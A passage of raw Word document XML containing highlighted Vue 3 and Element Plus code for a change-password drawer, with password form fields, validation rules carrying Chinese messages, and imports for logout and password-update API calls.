          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>确认密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93B7A9" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-input v-model="form.repassword" placeholder="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>再次输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>" type="password" show-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF995BB" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1D769" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1C4FE" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                            &lt;Lock /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4F02B0" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B26FF8B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722636A8" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0BCFF4" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4335A679" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4039D5" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F7A454" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-button @click="onSubmit" :loading="loading"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2567FF69" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE3145" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1874DA8B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F0BBFE" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-drawer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F68F3A4" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857916D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6272DAF0" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { ref, reactive } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4608F2" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D20AFF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { logout, updatePassword } from "~/api/manager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFCC5CF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { showModal, toast } from '~/composables/util'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783D62B3" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { useRouter } from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66005853" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { useStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36494630" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341677B4" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全屏，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">isFullscreen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否全屏，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">toggle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换全屏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB0D2E" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { useFullscreen } from '@vueuse/core'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263580EB" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const { isFullscreen, toggle } = useFullscreen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F7DBA" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA737EB" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C18E2DA" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const router = useRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C38CAE" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const store = useStore()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8ADA0" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7029B8BA" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA0B41B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const showDrawer = ref(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A1F17" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF7806E" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const form = reactive({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06FC51" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    oldpassword: "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A68BE" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    password: "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08613F82" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    repassword: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE02B8" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B11EE" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FB9D12" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const rules = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C58B90" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    oldpassword: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987ECDB" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96435C" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            required: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2E3EF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>旧密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F148D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            trigger: 'blur'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E943F0F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48441A7C" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8E095" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    password: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CB6A8" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53480EB1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            required: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6876F8" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>新密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8B354" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            trigger: 'blur'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF46FEF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E771C88" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E7F25" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
